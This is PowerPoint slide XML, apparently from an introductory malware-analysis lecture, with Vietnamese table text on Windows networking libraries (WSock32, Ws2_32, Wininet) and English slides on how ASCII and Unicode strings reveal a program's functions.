                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>đó</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>muốn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sử</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dụng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </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không</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cho</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>phép</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dùng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>của</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Windows </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>như</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>giấu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> file, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hoặc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>xử</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>lý</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tác</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>vụ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (process)</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5918">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>WSock32.dll /Ws2_32.dll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Đây</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>là</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thư</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>viện</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>liên</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>quan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>đến</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </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mạng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Một</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>chương</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>trình</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sử</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dụng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nó</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>có</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>khả</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>năng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sẽ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tạo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>kết</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nối</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>mạng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hoặc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thực</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hiện</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tác</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>vụ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>liên</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>quan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>.</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8">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>Wininet.dll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GB" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>Thư</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>viện</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>này</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>chứa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </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mạng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>bậc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cao</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>để</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>triển</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>khai</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>giao</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thức</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>như</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> FTP, HTTP, NTP.</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3959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Strings</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>A program contains strings if it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Print a message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Connects to a URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Copies file to a specific location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Strings (often in ASCII or Unicode) reveals functionalities of a program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3017717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Strings</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>ASCII</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Unicode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1403648" y="1649294"/>
            <a:ext cx="6984776" cy="1563682"/>
            <a:chOff x="1403648" y="1649294"/>
            <a:chExt cx="6984776" cy="1563682"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rounded Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1403648"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4C</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rounded Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2728748"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4F</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rounded Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4024892"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56</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5321036"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45</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rounded Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6642688"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9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1910495" y="2101498"/>
              <a:ext cx="314510" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>L</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3219565" y="2101497"/>
              <a:ext cx="393056" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
                <a:t>O</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4515709" y="2110959"/>
              <a:ext cx="367408" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>V</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5811853" y="2110959"/>
              <a:ext cx="335348" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>E</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6632879" y="1649294"/>
              <a:ext cx="1755545" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Null </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Terminator</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="Group 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1406561" y="4365104"/>
            <a:ext cx="6984776" cy="1584176"/>
            <a:chOff x="1406561" y="4365104"/>
            <a:chExt cx="6984776" cy="1584176"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1406561" y="5229200"/>
              <a:ext cx="66410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4C</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rounded Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
